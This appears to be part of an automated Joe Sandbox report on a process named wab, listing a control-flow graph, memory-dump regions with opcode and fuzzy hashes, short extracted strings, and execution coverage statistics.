                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1747 232c11b0-232c11d7 1748 232c11d9-232c11dc 1747->1748 1749 232c11de-232c11f3 1748->1749 1750 232c11f8-232c11fb 1748->1750 1749->1750 1751 232c11fd-232c1221 1750->1751 1752 232c1226-232c1229 1750->1752 1751->1752 1754 232c122b-232c1240 1752->1754 1755 232c1245-232c1248 1752->1755 1754->1755 1757 232c125f-232c1262 1755->1757 1758 232c124a-232c125a 1755->1758 1759 232c128f-232c1292 1757->1759 1760 232c1264-232c128a 1757->1760 1758->1757 1763 232c1294-232c12b0 1759->1763 1764 232c12b5-232c12b8 1759->1764 1760->1759 1763->1764 1766 232c13fc-232c13ff 1764->1766 1767 232c12be-232c13f7 1764->1767 1768 232c141c-232c141f 1766->1768 1769 232c1401-232c1407 1766->1769 1767->1766 1772 232c1421-232c143d 1768->1772 1773 232c1442-232c1445 1768->1773 1775 232c1411-232c1417 1769->1775 1772->1773 1776 232c1467-232c146a 1773->1776 1777 232c1447-232c1462 1773->1777 1775->1768 1781 232c146c-232c1482 1776->1781 1782 232c1487-232c148a 1776->1782 1777->1776 1781->1782 1783 232c148c-232c149a 1782->1783 1784 232c149f-232c14a1 1782->1784 1783->1784 1788 232c14a8-232c14ab 1784->1788 1789 232c14a3 1784->1789 1788->1748 1791 232c14b1-232c14ba 1788->1791 1789->1788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ,7*#
                                  • API String ID: 0-663257557
                                  • Opcode ID: fc1964fb18dc8fec41571a149380a158be6bf70d0403a2f5efebb6caa9e6bd21
                                  • Instruction ID: 47648d9319b315fb696ebecd75e80e9fabd7c5b61781900dd62b091dc6674161
                                  • Opcode Fuzzy Hash: fc1964fb18dc8fec41571a149380a158be6bf70d0403a2f5efebb6caa9e6bd21
                                  • Instruction Fuzzy Hash: 99914E34E0025A8BDB10DF68C880B9DB7B1FF99300F208699D549BB355DB71AE86CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: PH7q
                                  • API String ID: 0-600173912
                                  • Opcode ID: fcd17b8815fbaa3d7cc0cf14b0875dad6aff78e17858e413fb23358aa600429a
                                  • Instruction ID: f3108831db803fc45075a9584ad1aa762488473415f99d642df46d6fee572405
                                  • Opcode Fuzzy Hash: fcd17b8815fbaa3d7cc0cf14b0875dad6aff78e17858e413fb23358aa600429a
                                  • Instruction Fuzzy Hash: 74419530E002469FDF15DF69C94469EBBB2BF85340F218D69D416E7241EB71E986CB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q
                                  • API String ID: 0-2736656084
                                  • Opcode ID: 7034a20d0a7693f3da2db5ff5bc990daf1e44ca8e1079b5a36067ee3ef90137c
                                  • Instruction ID: df7ba1e0db7ca2160071df796d23fb010ec9f49bf89bbbd8f66829dffeb3f211
                                  • Opcode Fuzzy Hash: 7034a20d0a7693f3da2db5ff5bc990daf1e44ca8e1079b5a36067ee3ef90137c
                                  • Instruction Fuzzy Hash: FFF0E235B00246DFCB169A54ED84A9E7BB8EF40321F1A0AE2C901E7175C3399FC2CB40
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d35d3b8d30b5aef6c2d7ed7d050fc0fdbf1967016a7b7d7579163284302a586e
                                  • Instruction ID: 40cecbe3456588b2cf288d7624b80441424be62da98a5bfd4616107132e16aa0
                                  • Opcode Fuzzy Hash: d35d3b8d30b5aef6c2d7ed7d050fc0fdbf1967016a7b7d7579163284302a586e
                                  • Instruction Fuzzy Hash: 4B610671F001624BCF04AA79CC8495EF6EBAFC4A10B294879D80ADB3A5DE75DE4287D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a6ad4d53701071ba47017b15796d6c68184c0be1cbecbaf0b17af03bc9b833dd
                                  • Instruction ID: b0d1d5097c20b5485b01f7570f29d7b37f9f65b4ed13db8d14d6dbdcf4e30258
                                  • Opcode Fuzzy Hash: a6ad4d53701071ba47017b15796d6c68184c0be1cbecbaf0b17af03bc9b833dd
                                  • Instruction Fuzzy Hash: BE818334B002468FDB44DF69C95979EB7F3AF89700F118968D806EB384DB74ED828B91
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee6b339000b8f0e147b5e6b43952193bfc94cf46f1f023a6248ec2ac5fb23a59
                                  • Instruction ID: f915960750c6c9339507578d136eeba1e34efe908bf8aff76805d95694998eaa
                                  • Opcode Fuzzy Hash: ee6b339000b8f0e147b5e6b43952193bfc94cf46f1f023a6248ec2ac5fb23a59
                                  • Instruction Fuzzy Hash: 2B714C35A002899FDB14DFA9C984A9EBBF6AF84304F258969D405EB355DA30ED46CB40
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ed11b5433826443f07e7e5e37ce091447d73b0807774791fc0f8b767974d9f9d
                                  • Instruction ID: f9c9367a82d4b2a9154d2d2db222004e3f29e3a037c4713322c79afed17d6f39
                                  • Opcode Fuzzy Hash: ed11b5433826443f07e7e5e37ce091447d73b0807774791fc0f8b767974d9f9d
                                  • Instruction Fuzzy Hash: C1716C34A002898FDB04DFA9C984A9EBBF6EF84304F25C969D405EB355DB30ED86CB40
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63b4fd892d87dbfe95d6dc97a4b3095ee916d55bf10485895118309a060e7296
                                  • Instruction ID: 11b29a07e3dd90b52970e6a3f4793dee7153a53edbf6ab8f631d793164cfa24a
                                  • Opcode Fuzzy Hash: 63b4fd892d87dbfe95d6dc97a4b3095ee916d55bf10485895118309a060e7296
                                  • Instruction Fuzzy Hash: 73510870A103868FDF209BA8CCC075EB7B6FB45B10F258EA6D559D7242CA34D9C1CB51
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4092ab6055980100821724d36954996b1dc39b257d4003f06840003cb68c00d
                                  • Instruction ID: a5983457c6aa50335e2b721506a7ae79e2572d59cec87ce5a43d08041f2894c1
                                  • Opcode Fuzzy Hash: a4092ab6055980100821724d36954996b1dc39b257d4003f06840003cb68c00d
                                  • Instruction Fuzzy Hash: 5D41B175A003468FDF20DF99CC80A9FFBB6FB94B10F144E6AD21AD3241C671A985CB81
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf6bc711669675e0a764f81fa4e80845b948768a31005009849d84f0a495cfb2
                                  • Instruction ID: 7b07b199f3173f6a07dc2167ea49fe20219110fa7609643d71fee71385fa2afa
                                  • Opcode Fuzzy Hash: cf6bc711669675e0a764f81fa4e80845b948768a31005009849d84f0a495cfb2
                                  • Instruction Fuzzy Hash: 5E21BC75B012059FCB00CFB8C885AAEBBF1EF58B14F1481A9E905EB384E734D941CB90
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a921623ee03afc99976d3ee6190e906b3aa5f329d65379a9197fd2896be1a7c
                                  • Instruction ID: cca62d2d34bb572982fa0063fc3ae0bb972c1089ce9350f6d786389a08c94fba
                                  • Opcode Fuzzy Hash: 4a921623ee03afc99976d3ee6190e906b3aa5f329d65379a9197fd2896be1a7c
                                  • Instruction Fuzzy Hash: 6921AC75F413059FDB00DFA9C985A9EB7F5EB48B10F148169EA05E7384E734DA40CB90
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fd1d5291020384bd7ccb7f49d87290ff99a69aaa10bbbe1feedf6d09fa531d23
                                  • Instruction ID: 306aa9845665266162472ee74a74005d2a860de64d90aa0532934abb6858481f
                                  • Opcode Fuzzy Hash: fd1d5291020384bd7ccb7f49d87290ff99a69aaa10bbbe1feedf6d09fa531d23
                                  • Instruction Fuzzy Hash: 79210130B001459FCF04DB69DA5469DBBFAEF88310F158AA9D506EB342DB39DD82CB85
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882844431026.0000000002EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2ead000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 04d72092cec016b54b61ce6e137b65f67cbcc313930efa018fb2fff968272ec4
                                  • Instruction ID: ec392561da97405b4e2e81560d116d190908e26e34ab3253becf698d74759bdf
                                  • Opcode Fuzzy Hash: 04d72092cec016b54b61ce6e137b65f67cbcc313930efa018fb2fff968272ec4
                                  • Instruction Fuzzy Hash: 06212274684240DFDB15CF24DEE5B26BFA6EB88318F20C569D84A4F746C336E806CA61
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e3de9e47c837d8d058749756fbf3e8a7434cce1dda5b8b095428f2323822ac2a
                                  • Instruction ID: 92c38c2bb70cc1384441ac24888dc31f388f27462d585b85bf740c91dc98e02c
                                  • Opcode Fuzzy Hash: e3de9e47c837d8d058749756fbf3e8a7434cce1dda5b8b095428f2323822ac2a
                                  • Instruction Fuzzy Hash: 0B1165357001198BCB44A668CD186AFB3BBEBCC611F05C579D806E7344DE78DD428BD1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4fb88d68897798afbe8bf12e3caf7b8e2044468b730d04e57091d605e197e0a
                                  • Instruction ID: 05dae0d238beeee62df77639bb65a6edd6c063797d108b2b119bbe51f1742a99
                                  • Opcode Fuzzy Hash: d4fb88d68897798afbe8bf12e3caf7b8e2044468b730d04e57091d605e197e0a
                                  • Instruction Fuzzy Hash: 1B012D36B004410FD711A63C8854B1E77D6DBC9320F29CCA9E40AC7341E934DC468381
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 21ac7ab5ed0716c18aa083e363bbcf6e325de9c1084f116c2b8fbed47d8abc6d
                                  • Instruction ID: 3775fc379a383b4064b0db509f601252e336222ce7b000c064e518a404257c76
                                  • Opcode Fuzzy Hash: 21ac7ab5ed0716c18aa083e363bbcf6e325de9c1084f116c2b8fbed47d8abc6d
                                  • Instruction Fuzzy Hash: 3921E3B5D01259AFCB00CFAAE984ADEFFB4FF49310F10866AE518A7640C3746950CFA5
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882844431026.0000000002EAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_2ead000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 61a5db2228bb326d15582c4cfc4ffb9aab0961ce5e338eaf98e9cc1d3b6e7ea2
                                  • Instruction ID: ee95d8e3456876252b37c99f78bd39c063496b3f4bf2ec387d4d6761f2201ed1
                                  • Opcode Fuzzy Hash: 61a5db2228bb326d15582c4cfc4ffb9aab0961ce5e338eaf98e9cc1d3b6e7ea2
                                  • Instruction Fuzzy Hash: 07118E75544280DFDB11CF14D9D4B15FBA2FB84318F24C6ADD8494FA56C33AE44ACB62
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1e1ff3b442276784a0d8f2ff0297ba34cc2305004d1edd840bcb967820bcba94
                                  • Instruction ID: b21c9a7f42f09a4be082456fa4fe91dcfa840ee5d979bfc7f23fc06c5ca6c773
                                  • Opcode Fuzzy Hash: 1e1ff3b442276784a0d8f2ff0297ba34cc2305004d1edd840bcb967820bcba94
                                  • Instruction Fuzzy Hash: 1001A2317000551BDB14A57D891874BB7DACBCAA20F28C879E10ACB346E965DD4343D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2d6ca2f1e5a64c586f5bccbfae9cb45f7d80213349b068c47f17de9c24ddea31
                                  • Instruction ID: 6c5f187f2c4dddaf7cb6f10303544be2e40c7d8fdd2065ecea6c200732871c24
                                  • Opcode Fuzzy Hash: 2d6ca2f1e5a64c586f5bccbfae9cb45f7d80213349b068c47f17de9c24ddea31
                                  • Instruction Fuzzy Hash: 4811C2B5D01259AFCB00CF9AD984ADEFBB4FF49310F10862AE518A7640C374A950CBA5
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7e6760e16af83f9d74b945edbfd97d5cd086ac2da1d853beed3168a6d9fad5bb
                                  • Instruction ID: e76ec90687a624b0ebe7c2bb5bedc28b6b0ccb4255a7f733675fff7168b1a9da
                                  • Opcode Fuzzy Hash: 7e6760e16af83f9d74b945edbfd97d5cd086ac2da1d853beed3168a6d9fad5bb
                                  • Instruction Fuzzy Hash: 7401D131B000150BDB14A56D8918B0FB3CFCBC9B20F28C879E10AC7386E965EC4343D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf43c081050632505b796ffec5cfbbd24fc1f05628672ffb4d81688ca3e76cf6
                                  • Instruction ID: 8c64723f91e1a28615be27d1f5bbd18e77e4351bd067c82bbcbccc9b0c9b4f73
                                  • Opcode Fuzzy Hash: cf43c081050632505b796ffec5cfbbd24fc1f05628672ffb4d81688ca3e76cf6
                                  • Instruction Fuzzy Hash: 5801D13AB000120BC711A66D8858B2FB3CADBC9624F28CC39E90AC7340EA25DC468381
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3a89ff65b071cb7d89875c377e9d19eb5a3af59cf573cd6b46f5c42aee10c36e
                                  • Instruction ID: dd588c7a9db60d2a31bae44cefc8fe26eda4bee55725d4d83a79b6747f07ecff
                                  • Opcode Fuzzy Hash: 3a89ff65b071cb7d89875c377e9d19eb5a3af59cf573cd6b46f5c42aee10c36e
                                  • Instruction Fuzzy Hash: CE01D636B000154BDB48AA68CD186EF77EF9BC8610F0585BAC40AE7384EE64CD4247D1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 062ead5fd5f7bb244fb8938d33cafa682c1e8d592d8b9d343712b480307053ee
                                  • Instruction ID: e1eaf2742a1c936b56bab8ba6b404cf631c7356b00df829b3826f58af09edcee
                                  • Opcode Fuzzy Hash: 062ead5fd5f7bb244fb8938d33cafa682c1e8d592d8b9d343712b480307053ee
                                  • Instruction Fuzzy Hash: B0F0A973F201B506DF206569AC8169EA75DD7C5920F360E67D80AD3145D955CF8243C1
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4098867b99b57ee6ef3c57ad833a33bad906c5a2f45846db6558f53e940cbc53
                                  • Instruction ID: fe42c0d7102f33211a61225c475894c85180ec385fd1e772e2c5793bd7d0b92d
                                  • Opcode Fuzzy Hash: 4098867b99b57ee6ef3c57ad833a33bad906c5a2f45846db6558f53e940cbc53
                                  • Instruction Fuzzy Hash: 6901F434B400111BC700E67DCC68B0AB3DADB89710F28CD39E40BC7380EA25EE828780
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7fd47d38ff0f1b36127efd8eae535acf62ff269d14b5e477de01c4da3f2b6f6d
                                  • Instruction ID: 336d25f7774fa7c23028f12a2dfd2bcd478c070b9cdbe3ed4da40fc2bf1e3ced
                                  • Opcode Fuzzy Hash: 7fd47d38ff0f1b36127efd8eae535acf62ff269d14b5e477de01c4da3f2b6f6d
                                  • Instruction Fuzzy Hash: 33012D35F1025497CB049669DD49A8E7779FB85354F004579E801F7380DB32AD41CB80
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3b4b33e63362dd8bf919ded244dcc7eff85bdf0ab2da51bb80412642cc571bd4
                                  • Instruction ID: a4bfb180ad23781df49c6f96ffea67ed78250a4dc25e3c04f585f514ab027bdd
                                  • Opcode Fuzzy Hash: 3b4b33e63362dd8bf919ded244dcc7eff85bdf0ab2da51bb80412642cc571bd4
                                  • Instruction Fuzzy Hash: E601C834B401414BDB01E77DD868B0A77D5DB89614F28CA79E40AD7385EA25DD838781
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bd1377f0b1a779ed42bf29da525d10372305ea735d91f09253a87c6b468a34ac
                                  • Instruction ID: ea5fd01080ec57f69f49cb60e2e9c6a718c69eb162b442f576c1ba34d335c235
                                  • Opcode Fuzzy Hash: bd1377f0b1a779ed42bf29da525d10372305ea735d91f09253a87c6b468a34ac
                                  • Instruction Fuzzy Hash: 53E0D832E0025D5BDF20A5A8D8145CFBBBDF785720F11467BD909E7300E6219D45C7D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: h2*#$$7q$$7q$$7q$$7q$$7q$$7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-3962032853
                                  • Opcode ID: c61e6140ae9aa1dec33ee4c05e8d1963413c1ead8dd84b2e7a8e31822bd2b7ca
                                  • Instruction ID: 41145d190186fd4d4557570b52bec7ceabcbe0e95a67407d71b9e9f5da566f7e
                                  • Opcode Fuzzy Hash: c61e6140ae9aa1dec33ee4c05e8d1963413c1ead8dd84b2e7a8e31822bd2b7ca
                                  • Instruction Fuzzy Hash: 71129E34B00259CFDB15DF69CD94A9EB7B2BF84300F218AA9D50AAB355DB359D81CF40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q$$7q$$7q$$7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-3620162937
                                  • Opcode ID: 783e64faaf6b350bf98d396d91b2372fe5389d4a395b8caaeb59c39c9adfd4ad
                                  • Instruction ID: f0cf38c72c84c5709f11bb583943325949f520283bf2ed7b0ce9e6a687da6b36
                                  • Opcode Fuzzy Hash: 783e64faaf6b350bf98d396d91b2372fe5389d4a395b8caaeb59c39c9adfd4ad
                                  • Instruction Fuzzy Hash: D591B334A0024ADFDB14DF69CD94BAEBBB6BF84304F118A69D801A7381DB359D85CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .5Oq$$7q$$7q$$7q$$7q$$7q$$7q
                                  • API String ID: 0-932565753
                                  • Opcode ID: 23649913230675cb3c818857ff099790f2779256e1e093da5cad318f7c4061e7
                                  • Instruction ID: b6761cc202f23dfb6e8018e91e52cc611a90eddfc1d9f2cc9ece145b0db9737b
                                  • Opcode Fuzzy Hash: 23649913230675cb3c818857ff099790f2779256e1e093da5cad318f7c4061e7
                                  • Instruction Fuzzy Hash: 53F16334B00345CFDB09DB64CA44A6EBBB6BF94314F258968D406AB395CB39ED82CF44
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q$$7q$$7q$$7q
                                  • API String ID: 0-1116366105
                                  • Opcode ID: 73f46ff915598a0d5c993bb078310b66a75fc2c1a5aaafb02f2506d422e220cd
                                  • Instruction ID: bf494375de7b39542c40a9c3c3ca2a8da6da1931b38773836da98b1bcb83d47a
                                  • Opcode Fuzzy Hash: 73f46ff915598a0d5c993bb078310b66a75fc2c1a5aaafb02f2506d422e220cd
                                  • Instruction Fuzzy Hash: 53B18C34B00249CBCB15EF65C99466EBBB6FF84304F258969D406EB395CB75DC82CB90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4@*#$T?*#$x:*#$x:*#
                                  • API String ID: 0-3795019458
                                  • Opcode ID: d7c9ba70944f810c6e47460a3d3dd23b26f74d92eb6d680c15fdb47eb6f1ff82
                                  • Instruction ID: d2a225f9f88699c16441b0b69af6147c6ba23c68af580f5b66d25f21a8800b12
                                  • Opcode Fuzzy Hash: d7c9ba70944f810c6e47460a3d3dd23b26f74d92eb6d680c15fdb47eb6f1ff82
                                  • Instruction Fuzzy Hash: 55911A34A0021A8FDB14DF69C994A9EF7B6BF88304F1186D5D409AB355DB30ED86CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LR7q$LR7q$$7q$$7q
                                  • API String ID: 0-3951757628
                                  • Opcode ID: a7857c90444b95bbd35238e2f89c230def7a7a0a89540df6c97fcdc59dc778d3
                                  • Instruction ID: f0cad3f594a66ea74041103cfcb219105efab73958d34db5b2f9a04e69e5004b
                                  • Opcode Fuzzy Hash: a7857c90444b95bbd35238e2f89c230def7a7a0a89540df6c97fcdc59dc778d3
                                  • Instruction Fuzzy Hash: 305107347002459FDB08DB39C948A5AB7FAFF84704F258AA9E4069B395DB75EC41CF90
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.882858910725.00000000232C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 232C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_15_2_232c0000_wab.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $7q$$7q$$7q$$7q
                                  • API String ID: 0-1116366105
                                  • Opcode ID: aa5d09f7a72865b674249be7ebef26eede50963c86878d344dbe171f47bc54d5
                                  • Instruction ID: 3d75c5687de611c17bbfdbb46cd713059f893b4c42a7bdcd5045674bf2510575
                                  • Opcode Fuzzy Hash: aa5d09f7a72865b674249be7ebef26eede50963c86878d344dbe171f47bc54d5
                                  • Instruction Fuzzy Hash: 6A51C334B002498FCB15DB6CD9849ADB3B6FF84310F258AA9D506E7345DB35ED81CB80

                                  Execution Graph

                                  Execution Coverage:27.3%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:30.2%
                                  Total number of Nodes:215
                                  Total number of Limit Nodes:4
